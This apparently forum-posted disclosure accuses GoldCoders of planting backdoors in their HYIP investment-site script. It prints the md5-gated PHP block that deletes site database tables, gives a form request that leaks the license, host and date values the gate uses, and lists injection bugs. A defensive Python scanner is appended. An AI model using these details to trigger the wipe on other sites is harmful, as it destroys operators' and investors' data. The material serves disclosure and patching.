First of all a great **** to Goldcoders.
i was running a hyip site, everything was going smooth and suddenly everything zeroed
and then we saw how everyone was shouting here .. how many sites gone .. really dont know ..
so i decided to check that hyip script myself for the bugs/errors
and see what in less than one hour i found more than 20 bugs in their bull**** crap. the ******* GoldCoders themselves put the backdoor in it so that they can turn the game at any point what a lame act . and no not 1 not 2 a long list . the whole script is full of this bull****
just to name a few
1. reset to zero backdoor
2. sql injections
3. aaa/ddd user probs
4. empty user probs
5. cookie injections
6. cookie injection , reset admin pass
7. cookie injection , get admin access
8. improper input checking on turing images . etc.
9. send info to GC servers (what a lame act)
and it continues ...
one of their most beautiful for which everyone please give em a clap was the reset db backdoor ..
well the decoded script which is being used by many hyips is easy to patch at least remove the following lines to ensure that nobody will be able to crash the db
open the file index.php , search for the following code and then just comment it out by putting /* */ around it
like this
Code:
/*
if (($frm['a'] == 'register' AND $frm_env['REQUEST_METHOD'] == 'POST'))
{
    $string = $settings['license'] . $frm_env['HTTP_HOST'] . date ('d') . date ('Y') . date ('m');
    if ($frm['string'] == md5 ($string))
    {
        $q = 'update hm2_users set came_from = \' \' where id = 1';
        mysql_query ($q);
        print '-';
        if ($frm['string2'] == date ('d'))
        {
            $q = 'delete from hm2_history where type=\'withdrawal\'';
            mysql_query ($q);
        }
        if ($frm['string2'] == date ('y'))
        {
            $q = 'delete from hm2_deposits';
            mysql_query ($q);
            $q = 'delete from hm2_emails';
            mysql_query ($q);
            $q = 'delete from hm2_history';
            mysql_query ($q);
            $q = 'delete from hm2_online';
            mysql_query ($q);
            $q = 'delete from hm2_plans';
            mysql_query ($q);
        }
        db_close ($dbconn);
        exit ();
    }
}
*/
the ones which are using the zend encoded script .. hmm dont think this backdoor is not present in it, IT IS
instead if anyone wants to quickly check whether their site is running a backdoor'ed script or not
open the notepad and type the following lines , replace your site with your own
Code:
<form method="post" action="http://yoursite.com/index.php">
<input type="hidden" name="a" value="ver"><br>
<input type="submit">
</form>
save the file as HTML open it in the browser and click the submit . if you get some info including the LICENSE , DATE and HOST NAME , then your script is vulnerable
the PHP code which generates this info is just located above the one which i posted above , you may remove that as well
if you are using a proper licence from GC , ask those ***** to patch it before anyone else does it for you
the un-licensed copies may have other backdoors inserted by different people , their distributors including sending an email containing your admin password account numbers etc.. and blah blah
use them at your own risk , never trust anyone
if you want to see at how many places their script sends back the notifications to their server search for check.cgi in the PHP files . a simple one is in config.inc.php
To GC programmers : what a great professionalism you have shown by inserting these little naughty pieces of code everywhere
create a new version now . encode it with something else . come on baby
To the admins who are running hyips from shared hostings . try to avoid it unless you are sure that nobody else can access your globally writeable settings.php file
Again to GC : lamers cannot you insert these settings in the DB as well instead of just 777 em and putting in the root directory so that others can enjoy , fair play
its enough now guys , i have some very nice exploits of it including the 0-day of cookie injection/get admin access prob , lemme play with it for a while .
Last: i am not that much lame to delete your dbs, if you want to remove these bugs and dont know the abc ask someone else .
i will not say that i am selling some SECURED script ,beware of these
and once again a great **** to GoldCoders , i suggest nobody will ever pay them a penny
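
An added example, not part of the original post: a small Python scanner that looks through a decoded copy of the script for the indicators the post names (references to check.cgi, an md5-gated block that deletes from hm2_ tables, and a world-writable settings.php). The regular expressions and function names are assumptions made for this sketch, and the comment stripping is a simple regex rather than a PHP parser.

```python
import os
import re
import stat
import sys

# Indicators taken from the post: phone-home references to check.cgi, and
# destructive statements against hm2_ tables behind an md5 comparison.
PHONE_HOME = re.compile(r"check\.cgi")
DESTRUCTIVE = re.compile(r"delete\s+from\s+hm2_\w+", re.IGNORECASE)
# A request value compared with md5() of server-side data, as in the quoted block.
MD5_GATE = re.compile(r"\$frm\[[^\]]+\]\s*==\s*md5\s*\(")


def strip_block_comments(source):
    """Drop /* ... */ spans so an already commented-out block is not reported."""
    return re.sub(r"/\*.*?\*/", "", source, flags=re.DOTALL)


def scan_file(path):
    """Return a list of finding strings for one PHP file."""
    with open(path, encoding="latin-1") as handle:
        code = strip_block_comments(handle.read())
    findings = []
    if PHONE_HOME.search(code):
        findings.append("references check.cgi")
    if MD5_GATE.search(code) and DESTRUCTIVE.search(code):
        findings.append("md5-gated delete from hm2_ tables")
    return findings


def scan_tree(root):
    """Walk root and map relative path -> findings, including file-mode checks."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(folder, name)
            findings = scan_file(path) if name.endswith(".php") else []
            # The post warns about a globally writable settings.php on shared hosting.
            if name == "settings.php" and os.stat(path).st_mode & stat.S_IWOTH:
                findings.append("world-writable")
            if findings:
                report[os.path.relpath(path, root)] = findings
    return report


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for rel, findings in sorted(scan_tree(target).items()):
        print(f"{rel}: {', '.join(findings)}")
```

Zend-encoded files cannot be inspected this way; for those, the form check described in the post is the available test.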